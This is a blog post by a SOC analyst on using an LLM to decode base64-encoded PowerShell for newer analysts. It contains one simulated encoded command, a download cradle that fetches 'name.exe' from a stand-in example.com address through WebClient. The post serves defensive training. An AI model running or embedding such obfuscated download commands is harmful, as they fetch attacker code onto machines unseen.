Deobfuscation of PowerShell with LLM's

 





Hi all!

A huge barrier newer SOC analysts face today is not knowing what they don't know. Perhaps one of the most utilized tools by threat actors, PowerShell, and its subsequent encoding can seem daunting to analysts, especially given the huge blocks of encoded text it tends to produce. Despite the drawbacks, LLMs can greatly help with comprehension and understanding of decoding and PowerShell functionality.

As an example, here we have a simulated encoded command -

powershell.exe -EncodedCommand JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAG4AYQBtAGUALgBlAHgAZQAiADsAWwBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0AF0AOgA6AEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAApAA==

From simply looking at the PowerShell, we have no idea as an analyst what this encoded command is even doing. The traditional way of doing this in most SOC environments would be as follows:

  1.  Take the encoded portion of the command and paste it into Cyberchef - https://gchq.github.io/CyberChef (Or similar decoding software, but Cyberchef is the most common one SOC's use) 
  2. Hope there wasn't more complex encoding involved, and hopefully get a plaintext analysis back out by knowing(somehow) that the encoding used is base64. 

Have you already identified a few pain points for new analysts? For me, the main ones are:

  •            How can we identify that we need to use base64 decoding for this set of characters?
  •            What follow-up options might we need to make the content readable (null byte removal and white space removal)?
  •            The actual meaning of the PowerShell contained inside the encoded value.
Keep in mind that this is the tamest type of encoded value you will typically encounter - there are far more complex PowerShell encoding techniques. We all know SOC's love efficiency, so how does OpenAI perform with this?  

You can see the exact prompt I use below.


As you can see below, we get a very comprehensive analysis including alternate decoding methods, characteristics of the encoding pattern, full summaries of the PowerShell meaning - and more. 







While I don't plan to post a huge amount of AI-related content as I know we all hate that slop, when it covers a pain point of newer analysts in particular, I feel like the knowledge is great to have. Keep in mind the analyst is now able to expand upon this content in realtime simply by asking for the AI to expand on any element it presents, whereas in the past, this amount of knowledge was typically gained after hours of research at least. 

Thats all from me for today, I think I'll make my next post about some other types of encoded PowerShell like XOR and GZIP embedded encoding. Signing off.

Tony W

Comments